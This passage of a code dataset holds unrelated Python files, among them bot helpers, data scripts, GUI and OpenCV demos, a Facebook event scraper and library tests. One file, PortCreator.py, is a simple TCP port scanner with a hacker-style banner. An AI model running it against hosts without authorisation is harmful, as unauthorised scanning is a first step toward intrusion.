range(len(test_personas[i])):\n        if len(test_personas[i][j].split(' ')) < max_l:\n            test_personas[i][j] += ' EOS'\n            while len(test_personas[i][j].split(' ')) < max_l:\n                test_personas[i][j] += ' EOS'\n\n\noutput_file = open(\"persona.txt\", \"w\")\n\nfor i in range(len(train_pairs)):\n    output_file.write(train_pairs[i][0] + \"\\t\" + train_pairs[i][1])\n    output_file.write(\"\\t\" + emo_annotate_train_0[i] + \"\\t\" + emo_annotate_train_1[i])\n    for j in range(len(train_personas[i])):\n        output_file.write(\"\\t\" + train_personas[i][j])\n    output_file.write(\"\\n\")\noutput_file.close()\n\noutput_file = open(\"persona_test.txt\", \"w\")\n\nfor i in range(len(test_pairs)):\n    output_file.write(test_pairs[i][0] + \"\\t\" + test_pairs[i][1])\n    output_file.write(\"\\t\" + emo_annotate_test_0[i] + \"\\t\" + emo_annotate_test_1[i])\n    for j in range(len(test_personas[i])):\n        output_file.write(\"\\t\" + test_personas[i][j])\n    output_file.write(\"\\n\")\noutput_file.close()\n","sub_path":"r.py","file_name":"r.py","file_ext":"py","file_size_in_byte":11685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"623048467","text":"from . import data_database_queries, helper_database_queries, ali_db, main_bot, beta_bot, log_to_lab\nfrom . 
import rs_bot, web_app_address\nimport time\nfrom requests import post\nfrom pyrogram.errors import UserNotParticipant, FloodWait\n\nclass Chat:\n\n    def __init__(self, client, chat_id):\n        self.client = client\n        self.id = self.chat_id = chat_id\n\n    @property\n    def setting(self):\n        return helper_database_queries.get_group_setting(self.id)\n\n    @staticmethod\n    def is_spy(client):\n        try:\n            return client.is_spy\n        except AttributeError:\n            return False\n\n    def set_group_state(self, state):\n        data_database_queries.set_group_state(self.id, state)\n\n    class UserData:\n        def __init__(self, user, first_name):\n            self.user = user\n            self.first_name = first_name\n            self.is_alive = True\n            self.is_winner = True\n            self.status = 'member'\n            self.role_id = 0\n\n    def add_new_game(self, msg_id, user):\n        data_database_queries.add_new_game(self.id, msg_id, user)\n        self.set_group_state('jointime')\n        print(self.id, ' new game')\n\n    def join_time_pin(self, message):\n        settings = self.setting\n        if settings and not Chat.is_spy(self.client):\n            if settings['jointime_pin']:\n                try:\n                    rs_bot.pin_chat_message(message.chat.id, message.message_id)\n                except Exception as e:\n                    print(e)\n                    message.reply_text(\"/pinn@ExecutrixBot\")\n                time.sleep(5)\n            if settings['is_fillit_enable']:\n                message.reply_text(\"/fillit@TsWwPlus_Bot\")\n\n    def send_next_pin(self):\n        settings = self.setting\n        if settings and not Chat.is_spy(self.client):\n            try:\n                if settings.game_started_pin:\n                    try:\n                        res = post('{}/v1/game_started_pin'.format(web_app_address), json={'chat_id': self.id})\n                        res = res.json()\n                        if not res['error']:\n                            return\n                    except Exception as e:\n                        print(e)\n                    self.client.send_message(\n                        chat_id=self.id,\n                        text=\"#next\")\n            except:\n                pass\n        self.set_group_state('ingame')\n\n\n    def delete_join_link(self):\n        ali_db.delete_link(self.id)\n\n    def first_list(self, message):\n        users_data = [ent.user.id for ent in message.entities if ent.type == 'text_mention']\n        try:\n            settings = self.setting\n            if settings and not Chat.is_spy(self.client):\n                if self.id in helper_database_queries.manager_chats:\n                    message.reply_text(\"/tag_del@manage_ww_bot\", quote=False)\n                if settings.role_saver:\n                    if settings.role_saver == 1:\n                        res = post('{}/v1/uploadFirstList'.format(web_app_address), json={\n                            'chat_id': self.id,\n                            'message_id': message.message_id,\n                            'text': message.text,\n                            'users': users_data\n                        })\n                        try:\n                            res = res.json()\n                            if not res['error']:\n                                return\n                        except Exception as e:\n                            print(e)\n                        message.reply_text(\"/up@role_ww_bot\")\n                    elif settings.role_saver == 2:\n                        message.reply_text(\"/new@TsWwPlus_Bot\")\n        except:\n            pass\n        print(self.id, ' first list')\n        self.set_group_state('ingame')\n\n    def start_game(self, message):\n        players = [ent.user.id for ent in message.entities if ent.type == 'text_mention']\n        print(self.id, ' game start', players, len(players))\n        data_database_queries.start_game(self.id, len(players))\n\n    def game_list(self, message):\n        settings = self.setting\n        if settings and not Chat.is_spy(self.client):\n            if settings.role_saver:\n                if settings.role_saver == 1:\n                    users_data = [ent.user.id for ent in message.entities if ent.type == 'text_mention']\n                    res = post('{}/v1/uploadGameList'.format(web_app_address), json={\n                        'chat_id': self.id,\n                        'message_id': message.message_id,\n                        'text': message.text,\n                        'users': users_data\n                    })\n                    try:\n                        res = res.json()\n                        if not res['error']:\n                            return\n                    except Exception as e:\n                        print(e)\n                    message.reply_text(\"/up@role_ww_bot\")\n                elif settings.role_saver == 2:\n                    message.reply_text(\"/tsup@TsWwPlus_Bot\")\n        print(self.id, ' game list')\n\n    
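# game_finish below follows the same shape as the handlers above: it first\n    # reports the finished game to the companion web app (a POST to\n    # '{}/v1/finishGame'.format(web_app_address) with this group's chat id) and\n    # then sends the follow-up in-chat bot commands.\n    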
def game_finish(self, message):\n        settings = self.setting\n        user = message.from_user.id\n        if settings and not Chat.is_spy(self.client):\n            try:\n                res = post('{}/v1/finishGame'.format(web_app_address), json={\n                    'chat_id': self.id,\n                    'message_id': message.message_id\n                })\n                try:\n                    res.json()\n                except Exception as e:\n                    print(e)\n\n                if self.id in [-1001232594917, -1001414470547]:\n                    message.reply_text(\"/getpoints\")\n                    time.sleep(1)\n\n                if settings.is_confirm_tsww_enable:\n                    message.reply_text(\"/confirm@TsWwPlus_Bot\")\n                    time.sleep(1)\n\n                if settings.is_startnewgame_enable:\n                    if settings.start_mode == 1:\n                        msg = \"/startchaos\"\n                    else:\n                        msg = \"/startgame\"\n                    if user == main_bot:\n                        msg += \"@werewolfbot\"\n                    elif user == beta_bot:\n                        msg += \"@werewolfbot\"\n                    message.reply_text(msg, quote=False)\n            except Exception as e:\n                print(e)\n        self.set_group_state('idle')\n\n    def game_finish_db(self, message):\n        data_database_queries.finish_game(self.id)\n        try:\n            users = [self.UserData(entity.user.id, entity.user.first_name) for entity in message.entities\n                     if entity.type in ('mention', 'text_mention')]\n            for user in users:\n                try:\n                    r = self.client.get_chat_member(self.id, user.user)\n                    user.status = r.status\n                except UserNotParticipant as e:\n                    user.status = 'left'\n                except:\n                    user.status = 'Error'\n            print('game finish db start save')\n            data_database_queries.define(message.text, users, self.id, message.message_id)\n            data_database_queries.define_winner(message)\n            print('game finish db end save')\n        except Exception as e:\n            log_to_lab(str(self.id) + ' failed on adding')\n            log_to_lab(' '.join(e.args))\n            log_to_lab(message.text.markdown)\n\n    def cancel_game(self, message):\n        settings = self.setting\n        if settings and not Chat.is_spy(self.client):\n            if self.id in helper_database_queries.manager_chats:\n                message.reply_text(\"/tag_del@manage_ww_bot\", quote=False)\n        self.delete_join_link()\n        data_database_queries.cancel_game(self.id)\n        self.set_group_state('idle')\n\n    def grey_next(self, message):\n        msg_id = message.message_id\n        rep = message.reply_to_message\n        if rep.text and not Chat.is_spy(self.client):\n            if rep.from_user.is_self:\n                if rep.text == '#next':\n                    settings = self.setting\n                    if (settings and settings.game_started_pin) or not settings:\n                        try:\n                            time.sleep(4)\n                            try:\n                                rs_bot.pin_chat_message(self.id, msg_id, disable_notification=True)\n                            except Exception as e:\n                                print(e)\n                                message.reply_text(\"/pin@ExecutrixBot\")\n                        except FloodWait as e:\n                            pass\n\n    def add_gp(self, message):\n        title = message.chat.title\n        text = message.text\n        link = text.replace('add gp ', '').replace('Add gp', '')\n        if link:\n            try:\n                group_title = self.client.get_chat(link).title\n            except:\n                message.reply_text('The provided link is not valid')\n                return\n            if title != group_title:\n                message.reply_text('The provided link does not belong to this group')\n                return\n            admins = self.client.get_chat_members(self.id, filter='administrators')\n            creator = None\n            for admin in admins:\n                if admin.status == 'creator':\n                    creator = admin.user.id\n            helper_database_queries.add_group(self.id, title, creator, link)\n            message.reply_text('The group has been set up', quote=False)\n        else:\n            message.reply_text('You forgot to include the link')\n\n    def add_message_as_mention(self, message):\n        message_id = message.message_id\n        user_id = message.from_user.id\n        entities = message.entities\n        if entities and not Chat.is_spy(self.client):\n            group_info = data_database_queries.get_group_status(self.id)\n            if group_info:\n                if group_info == 'idle':\n                    status = 0\n                elif group_info == 'ingame':\n                    status = 2\n                elif 
group_info == 'jointime':\n                    status = 1\n                else:\n                    status = 0\n            else:\n                return\n            if status == 1:\n                entity_length = 0\n                message_length = len(message.text)\n                for entity in entities:\n                    if entity['type'] in ['text_mention', 'mention']:\n                        entity_length += entity['length']\n                if entity_length / message_length >= 0.4:\n                    data_database_queries.add_message_for_delete_database(message_id, self.id, user_id)\n\n    def save_game_link(self, message):\n        user_id = message.from_user.id\n        try:\n            url = message.click(0)\n            ali_db.add_start(self.id, url, user_id)\n        except ValueError as e:\n            pass\n        except Exception as e:\n            log_to_lab(' '.join(e.args))\n\n    def save_afk(self, message):\n        afked_players = list(set([ent.user.id for ent in message.entities if ent.type == 'text_mention']))\n        [data_database_queries.save_afk(self.id, u) for u in afked_players]\n        if self.id == -1001476763360:\n            try:\n                [data_database_queries.save_afk_lu(u, message.message_id) for u in afked_players]\n            except:\n                pass\n\n    def save_vote(self, message):\n        votes = [ent.user.id for ent in message.entities if ent.type == 'text_mention']\n        tmp = []\n        for vote in votes:\n            tmp.append(vote)\n            if len(tmp) == 2:\n                voter, voted = tmp\n                data_database_queries.save_vote(self.id, voter, voted)\n                tmp = []\n","sub_path":"src/app/methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":11793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"403104472","text":"from tkinter import *\nimport sqlite3\n\nwindow = Tk()\n#create a database table\n\ndef create_table():\n    conn=sqlite3.connect(\"book.db\")\n    cur=conn.cursor()\n    cur.execute(\"CREATE TABLE IF NOT EXISTS book (item TEXT,type TEXT,language TEXT, deadline INTEGER)\")\n    conn.commit()\n    conn.close()\n\ndef insert(item,type,language,deadline):\n    conn=sqlite3.connect(\"book.db\")\n    cur=conn.cursor()\n    cur.execute(\"INSERT INTO book VALUES (?,?,?,?)\", (item,type,language,deadline))\n    conn.commit()\n    conn.close()\n\n\n\n","sub_path":"Booklist1/frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"460094203","text":"# INF552 HW4\r\n# Shih-Yu Lai 7183984563\r\n# Shiuan-Chin Huang 9815633745\r\n\r\nimport numpy as np\r\n\r\ndef readFile():\r\n    data = np.loadtxt(\"linear-regression.txt\", dtype=\"float\", delimiter=\",\")\r\n    XY = np.array(data[:, 0:2]) # store X and Y, ex: [0.6937807956355748, 0.69754351093898]\r\n    Z = np.array(data[:, 2]) # store Z, ex: 3.2522896815114373, ...\r\n    return XY, Z\r\n\r\n\r\ndef main():\r\n    XY, Z = readFile()\r\n    m, n = XY.shape # get the m*n number\r\n    bias = np.ones((m, 1))\r\n    XY = np.concatenate((bias, XY), axis = 1)\r\n    XY_T = np.linalg.inv(np.dot(XY.T, XY))\r\n    weights = np.dot(XY_T, np.dot(XY.T, Z))\r\n    print(\"intercept : \" + str(weights[0]))\r\n    print(\"weights: \" + str(weights[1:]))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    main()","sub_path":"Inf552_HW4/linearRegression.py","file_name":"linearRegression.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"303038896","text":"'''\nfrom opencv.org tutorials\nhttps://docs.opencv.org/4.5.2/dc/da5/tutorial_py_drawing_functions.html\n\nDrawing functions in OpenCV\n\n'''\n\n\nimport numpy as np\nimport cv2 as cv\n\n# Create a black image\nimg = np.zeros((512, 512, 3), np.uint8)\n\n# Draw a diagonal blue line 
with thickness of 5 px\ncv.line(img, (0, 0), (511, 511), (255, 0, 0), 5)\n\n# Drawing Rectangle\ncv.rectangle(img, (348, 0), (510, 128), (0, 255, 0), 3)\n\n# Drawing Circle\ncv.circle(img, (447, 63), 63, (0,0,225), -1)\n\n# Drawing Ellipse\n# cv.ellipse(img, (256, 256), (100, 50), 0, 0,180, 255, -1)\ncv.ellipse(img, (256, 256), (100, 50), 0, 0,180, (0, 255, 0), -1)\n\n# Drawing Polygon\npts = np.array([[10,5], [20,30], [70,20], [50,10]], np.int32)\npts = pts.reshape((-1,1,2))\n# cv.polylines(img, [pts], True, (0,225,255))\ncv.polylines(img, [pts], False, (0,225,255))\n\n\nfont = cv.FONT_HERSHEY_SIMPLEX\n# cv.putText(img, 'OpenCV', (10,500), font, 4, (255, 255, 255), 2, cv.LINE_AA)\ncv.putText(img, 'fucking the word', (10,500), font, 1, (255, 255, 255), 2, cv.LINE_AA)\n\n\n\n\n\n# Helper code for displaying and saving the image\ncv.imshow(\"draw img window\", img)\nk = cv.waitKey(0)\nif k == ord(\"s\"):\n    cv.imwrite('image5.jpg', img)\n    cv.destroyAllWindows()\nelif k == ord('q'):\n    cv.destroyAllWindows()\n\n\n\n\n\n\n\n","sub_path":"opencv_test/drawFun.py","file_name":"drawFun.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"398892247","text":"from tkinter import *\nfrom PIL import ImageTk\nimport PIL.Image\nimport src.video as vi\nimport src.webcam as we\nfrom tkinter import filedialog\nimport src.report as re \n\nHEIGHT = 1000\nWIDTH = 1000\nwindow = Tk()\nwindow.title(\"ALMA share\")\ncanvas = Canvas(window, height=HEIGHT, width=WIDTH)\ncanvas.pack()\nicon = PIL.Image.open(\"./images/icon.png\")\n\n# background\nimage = PIL.Image.open(\"./images/second.jpg\")\nbackground_image = ImageTk.PhotoImage(image)\nbackground_label = Label(window, image=background_image)\nbackground_label.place(relwidth=1, relheight=1)\n\n# title\nlabel = Label(window, text=\"ALMA\",bg='#94b1ee',fg=\"black\", width=200, font='Escalope 65 bold')\nlabel.place(relx=0.5, rely=0.13, relwidth=1, relheight=0.15, anchor='n')\n#label.config(font=(\"bold\", 50))\n\n# facial emotion recognition\nlabel = Label(window, text=\"facial emotion recognition\", fg=\"black\",\n              bg='#ffda00', width=200, font=\"Comfortaa 14 bold\")\nlabel.place(relx=0.5, rely=0.23, relwidth=0.3, relheight=0.04, anchor='n')\n\n# choose\nlabel = Label(window, text=\"Choose your own path\", fg=\"black\",\n              bg='#94b1ee', width=200, font=\"Comfortaa 14 bold\")\nlabel.place(relx=0.5, rely=0.40, relwidth=0.75, relheight=0.05, anchor='n')\n\n# button - webcam\nframe = Frame(window, bg='#94b1ee', bd=5)\nframe.place(relx=0.3125, rely=0.45, relwidth=0.375,\n            relheight=0.1, anchor='n')\n\n\nbutton = Button(frame, cursor=\"heart\", text=\"Webcam\", font=\"Comfortaa 18 bold\",command=lambda: we.webcam(counttoclose=0, idvideo=67))\nbutton.place(relx=0, relheight=1, relwidth=1)\nbutton.configure(foreground='black', relief='groove')\n\n\n# button - video\nframe = Frame(window, bg='#94b1ee', bd=5)\nframe.place(relx=0.6875, rely=0.45, relwidth=0.375,\n            relheight=0.1, anchor='n')\n\nbutton = Button(frame, cursor=\"heart\", text=\"Video\", font=\"Comfortaa 18 bold\", command=lambda: vi.video(idvideo=69))\nbutton.place(relx=0, relheight=1, relwidth=1)\nbutton.configure(foreground='black', relief='groove')\n\n# separator\nlabel = Label(window, bg='black', width=200)\nlabel.place(relx=0.5, rely=0.5525, relwidth=0.75, relheight=0.005, anchor='n')\n\n#thank you\nlabel = Label(window, text=\"Thank you for using our services\", fg=\"black\",\n              bg='#94b1ee', width=200, font=\"Comfortaa 12 bold\")\nlabel.place(relx=0.5, 
rely=0.56, relwidth=0.75, relheight=0.05, anchor='n')\n\nlabel = Label(window, text=\"If you would like to get a report of what you've just seen, press the button below\", fg=\"black\",\n              bg='#94b1ee', width=200, font=\"Comfortaa 10 bold\")\nlabel.place(relx=0.5, rely=0.60, relwidth=0.75, relheight=0.05, anchor='n')\n\n# button - report\nframe = Frame(window, bg='#94b1ee', bd=5)\nframe.place(relx=0.5, rely=0.65, relwidth=0.75,\n            relheight=0.1, anchor='n')\n\n\nbutton = Button(frame, cursor=\"heart\", text=\"Get your report\", font=\"Comfortaa 18 bold\",command=lambda: re.getReport(idvideo=69))\nbutton.place(relx=0, relheight=1, relwidth=1)\nbutton.configure(foreground='black', relief='groove')\n\nwindow.mainloop()","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"144799528","text":"# list []\n# A data structure that can store multiple values at once; uses square brackets [] and holds zero or more elements\n# Individual elements can be accessed by index -> (data can be extracted with a for loop)\n# A mutable list whose data can be changed\n# Inside the brackets, a start and end index can be set with :\n# The end index is set one greater than the actual last index\n# A list cannot be used as a dictionary key (hash), but a tuple can (because dictionary keys must be immutable values)\n\n# List initialization\nlist1 = [1, 2, 3, 'sdf', ['a', 'b', True]]\nlist2 = [0, 5]\n\n# [:] -> everything, [0:] -> from 0 to the end, [:4] -> up to the first 4 items\nprint(\"list indexing output\", list1[:-1])\n\n# Initialize a one-dimensional list of size n with every value set to 1\nn = 5\nexam_list = [1] * n\nprint(exam_list)\n\n# Difference between list and tuple -> list is mutable, tuple is immutable; speed: list < tuple (tuples are faster)\n\n# dic {}\n# Uses curly braces {}\n# Similar to Java's Map: a data structure of 1:1 key : value pairs\n# Each key maps to exactly one value; a key cannot be changed, but its value can\ndic = {'name': 'lion', 'age': 1}\ndic2 = dict(name='lion', age=1)\n\ndic['sex'] = 'male' # add a key\n# print(dic.get('name'))\ndel dic['name']\ndic.clear()\n# print(dic2.get('name')) # 'lion'\n# print('name' in dic2) # True\n\n# tuple\n# A data structure that can store multiple values at once; uses parentheses () and holds zero or more elements\n# Individual elements can be accessed by index -> (data can be extracted with a for loop)\n# An immutable sequence whose data cannot be changed (# TypeError: 'tuple' object does not support item assignment)\n\ntuple1 = (1, \"tuple_study\")\ntuple2 = (3, 4.22)\ntuple3 = tuple1 + tuple2\ntuple4 = tuple1 * 5\n\ntt = ('a',)+(1231923,) + tuple1[1:]\nprint(tt)\n\nprint(tuple1)\n# # tuple1[0] = 2 raises an error: tuples cannot be modified\n# print(tuple1)\nprint(tuple2)\nprint(tuple3)\nprint(tuple4)\n\n\n# List slice; remove (finds and removes the first element equal to the argument); del; pop (removes the element at the given index)\na = [1, 2, 1, 3, 4, 5, 1]\nb = [1, 2, 1, 3, 4, 5, 1]\n\na.remove(1)\n# pop returns the removed element as a value, while del does not -> del is marginally faster than pop\nremoved = b.pop(1)\nprint(\"remove a : \", a)\n\nprint(\"removed : \", removed)\nprint(\"pop b : \", b)\n","sub_path":"python_grammer_example/basic_structure.py","file_name":"basic_structure.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"98864273","text":"##############################################\n## Author: I-No Liao ##\n## Date of update: 2018/10/08 ##\n## Description: Leetcode #071 ##\n##############################################\n\n# Given an absolute path for a file (Unix-style), simplify it. \n# For example,\n# path = \"/home/\", => \"/home\"\n# path = \"/a/./b/../../c/\", => \"/c\"\n# path = \"/a/../../b/../c//.//\", => \"/c\"\n# path = \"/a//b////c/d//././/..\", => \"/a/b/c\"\n# \n# In a UNIX-style file system, a period ('.') refers to the current directory, so it can be ignored in a simplified path. 
Additionally, a double period (\"..\") moves up a directory, so it cancels out whatever the last directory was. For more information, look here: https://en.wikipedia.org/wiki/Path_(computing)#Unix_style\n# Corner Cases:\n# \n# Did you consider the case where path = \"/../\"?\n# In this case, you should return \"/\".\n# Another corner case is the path might contain multiple slashes '/' together, such as \"/home//foo/\".\n# In this case, you should ignore redundant slashes and return \"/home/foo\".\n\n# I-No\n# Time: O(n)\nclass Solution:\n # @param path: str\n # @return str\n def simplifyPath(self, path):\n # Get element\n element = []\n temp = ''\n for char in path:\n if char == '/':\n if not temp:\n continue\n else:\n if temp != '.': \n element.append(temp)\n temp = ''\n else:\n temp += char\n if temp and temp != '.':\n element.append(temp)\n \n # Get answer\n ans = []\n for s in element:\n if s != '..':\n ans.append(s)\n elif ans:\n ans.pop()\n return '/' + '/'.join(ans)\n\n# I-No\n# Time: O(n)\n# Use string split function\nclass Solution_2:\n # @param path: str\n # @return str\n def simplifyPath(self, path):\n # Get element\n path = path.split('/')\n path = [x for x in path if x != '.' and x != '']\n # Get answer\n ans = []\n for s in path:\n if s != '..':\n ans.append(s)\n elif ans:\n ans.pop()\n return '/' + '/'.join(ans)\n\n# Main\nif __name__ == '__main__':\n path = '/home/'\n print(Solution().simplifyPath(path))\n path = '/a/./b/../../c/'\n print(Solution().simplifyPath(path))\n path = '/a/../../b/../c//.//'\n print(Solution().simplifyPath(path))\n path = '/a//b////c/d//././/..'\n print(Solution().simplifyPath(path))\n path = '/../'\n print(Solution().simplifyPath(path))\n path = '/...'\n print(Solution().simplifyPath(path))\n path = '/.'\n print(Solution().simplifyPath(path))\n","sub_path":"071_SimplifyPath.py","file_name":"071_SimplifyPath.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"150635290","text":"from rest_framework import serializers\nfrom produtos.models import Produto\nfrom produtos.serializers import ProdutoSerializer\nfrom vendas.models import Venda\nfrom decimal import Decimal\n\nclass ProdutoLigthSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n nome = serializers.CharField(read_only=True)\n\nclass VendaSerializer(serializers.Serializer):\n produto = ProdutoLigthSerializer()\n desconto = serializers.IntegerField()\n valor_total = serializers.DecimalField(max_digits=10, decimal_places=2, read_only=True)\n forma_pagamento = serializers.ChoiceField(choices=Venda.formas_pagamento)\n\n def create(self, validated_data):\n produto_data = validated_data.pop('produto')\n produto = Produto.objects.get(id=produto_data['id'])\n desconto = validated_data.get('desconto')\n valor_total = Decimal(float(produto.valor) *(1- desconto / 100))\n\n venda = Venda.objects.create(\n produto=produto, \n valor_total=valor_total, \n **validated_data\n )\n return venda","sub_path":"vendas/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"489345995","text":"from leechers.platformleecher import PlatformLeecher\nimport facebook\nfrom os import remove\nfrom dateparser import parse as dateparse\nfrom datetime import datetime\nfrom requests import exceptions\nfrom pandas import Timestamp\n\n\nclass FacebookEventLeecher(PlatformLeecher):\n 
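# Hedged usage sketch (the band name, MBID, and page URL below are made-up\n    # examples, not from the original project):\n    #   leecher = FacebookEventLeecher()\n    #   leecher.set_events_for_identifier('Some Band', '00000000-0000-0000-0000-000000000000', 'https://www.facebook.com/somebandpage')\n    #   print(leecher.events)\n    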
def __init__(self, root=\"./leechers/resources/\"):\n        super().__init__(root=root)\n        with open(root + \"facebook_access_token.txt\") as f:\n            fb_token = f.read()\n        self.graph = facebook.GraphAPI(access_token=fb_token, version=\"2.10\")\n        self.platform = \"facebook\"\n        try:\n            remove(\"facebook_errors.txt\")\n        except FileNotFoundError:\n            pass\n\n    def set_events_for_identifier(self, band, mbid, url):\n        page_label = url.split(\"/\")[-1].split(\"-\")[-1] if \"-\" in url.split(\"/\")[-1] else url.split(\"/\")[-1]\n        print(page_label)\n        try:\n            events = self.graph.get_connections(id=page_label, connection_name=\"events\")\n            print(events)\n            if \"data\" in events:\n                for concert in events[\"data\"]:\n                    self.events.append(self.map_platform_to_schema(concert, band, mbid, {\"page_label\": page_label}))\n        except facebook.GraphAPIError as e:\n            with open(\"resources/facebook_errors.txt\", \"a\") as f:\n                f.write(datetime.now().date().isoformat() + \"\\t\" + url + \"\\t\" + str(e) + \"\\n\")\n        except exceptions.ConnectionError:\n            self.set_events_for_identifier(band, mbid, url)\n\n    def map_platform_to_schema(self, concert, band, mbid, other):\n        venue = concert[\"place\"][\"name\"] if \"place\" in concert else None\n        stad = concert[\"place\"][\"location\"][\"city\"] if \"place\" in concert and \"location\" in concert[\"place\"] and \"city\" in concert[\"place\"][\"location\"] else None\n        state = concert[\"place\"][\"location\"][\"state\"] if \"place\" in concert and \"location\" in concert[\"place\"] and \"state\" in concert[\"place\"][\"location\"] else None\n        land = concert[\"place\"][\"location\"][\"country\"] if \"place\" in concert and \"location\" in concert[\"place\"] and \"country\" in concert[\"place\"][\"location\"] else None\n        if state is not None and stad is not None and land in [\"United States\", \"Brazil\", \"Canada\", \"Australia\"]:\n            stad = stad + \", \" + state\n        einddatum = Timestamp(dateparse(concert[\"end_time\"]).date()) if \"end_time\" in concert else None\n        return {\n            \"titel\": concert[\"name\"] if \"name\" in concert else None,\n            \"titel_generated\": str(band) + \" @ \" + str(venue) + \" in \" + str(stad) + \", \" + str(land),\n            \"datum\": Timestamp(dateparse(concert[\"start_time\"]).date()),\n            \"einddatum\": einddatum,\n            \"event_type\": \"festival\" if einddatum else None,\n            \"artiest\": band,\n            \"artiest_id\": \"facebook_\" + other[\"page_label\"],\n            \"artiest_mb_naam\": band,\n            \"artiest_mb_id\": mbid,\n            \"stad\": stad,\n            \"land\": land,\n            \"venue\": venue,\n            \"latitude\": concert[\"place\"][\"location\"][\"latitude\"] if \"place\" in concert and \"location\" in concert[\"place\"] and \"latitude\" in concert[\"place\"][\"location\"] else None,\n            \"longitude\": concert[\"place\"][\"location\"][\"longitude\"] if \"place\" in concert and \"location\" in concert[\"place\"] and \"longitude\" in concert[\"place\"][\"location\"] else None,\n            \"source\": self.platform,\n            \"event_id\": \"facebook\" + concert[\"id\"]\n        }\n","sub_path":"leechers/facebookleecher.py","file_name":"facebookleecher.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"578279649","text":"import pyfiglet\r\nimport sys\r\nimport socket\r\nfrom datetime import datetime\r\n\r\nBanner = pyfiglet.figlet_format(\"Dark Dante \")\r\nprint(Banner)\r\n\r\n# Defining a Target\r\n\r\nif len(sys.argv) == 2:\r\n\r\n    # Resolve the host name to an IPv4 address\r\n    target = socket.gethostbyname(sys.argv[1])\r\n\r\nelse:\r\n    print(\"Invalid number of arguments 
\")\r\n\r\nprint(\" - \" * 50)\r\nprint(\" Scanning Target \"+target)\r\nprint(\" Scanning Started at: \" + str(datetime.now()))\r\nprint(\" - \" * 50)\r\n\r\n# Scan ports between 1 to 65,535\r\n\r\ntry:\r\n for port in range(1, 100):\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n socket.setdefaulttimeout(1)\r\n\r\n # returns an error indicator\r\n\r\n Banner = s.connect_ex((target, port))\r\n if Banner == 0:\r\n print(\"Port {} is open \".format(port))\r\n s.close()\r\n\r\nexcept KeyboardInterrupt:\r\n\r\n print(\" \\n Exitting Program ! ! ! \")\r\n sys.exit()\r\n\r\nexcept socket.gaierror:\r\n\r\n print(\" \\n Hostname Could Not Be Resolved ! ! ! \")\r\n sys.exit()\r\n\r\nexcept socket.error:\r\n\r\n print(\" \\n Server not Responding ! ! ! \")\r\n sys.exit()\r\n","sub_path":"PortCreator.py","file_name":"PortCreator.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"304799492","text":"import errno\nimport os\n\nfrom atomicwrites import atomic_write\n\nimport pytest\n\n\ndef test_atomic_write(tmpdir):\n fname = tmpdir.join('ha')\n for i in range(2):\n with atomic_write(str(fname), overwrite=True) as f:\n f.write('hoho')\n\n with pytest.raises(OSError) as excinfo:\n with atomic_write(str(fname), overwrite=False) as f:\n f.write('haha')\n\n assert excinfo.value.errno == errno.EEXIST\n\n assert fname.read() == 'hoho'\n assert len(tmpdir.listdir()) == 1\n\n\ndef test_teardown(tmpdir):\n fname = tmpdir.join('ha')\n with pytest.raises(AssertionError):\n with atomic_write(str(fname), overwrite=True):\n assert False\n\n assert not tmpdir.listdir()\n\n\ndef test_replace_simultaneously_created_file(tmpdir):\n fname = tmpdir.join('ha')\n with atomic_write(str(fname), overwrite=True) as f:\n f.write('hoho')\n fname.write('harhar')\n assert fname.read() == 'harhar'\n assert fname.read() == 'hoho'\n assert len(tmpdir.listdir()) == 1\n\n\ndef test_dont_remove_simultaneously_created_file(tmpdir):\n fname = tmpdir.join('ha')\n with pytest.raises(OSError) as excinfo:\n with atomic_write(str(fname), overwrite=False) as f:\n f.write('hoho')\n fname.write('harhar')\n assert fname.read() == 'harhar'\n\n assert excinfo.value.errno == errno.EEXIST\n assert fname.read() == 'harhar'\n assert len(tmpdir.listdir()) == 1\n\n\n# Verify that nested exceptions during rollback do not overwrite the initial\n# exception that triggered a rollback.\ndef test_open_reraise(tmpdir):\n fname = tmpdir.join('ha')\n with pytest.raises(AssertionError):\n aw = atomic_write(str(fname), overwrite=False)\n with aw:\n # Mess with internals, so commit will trigger a ValueError. 
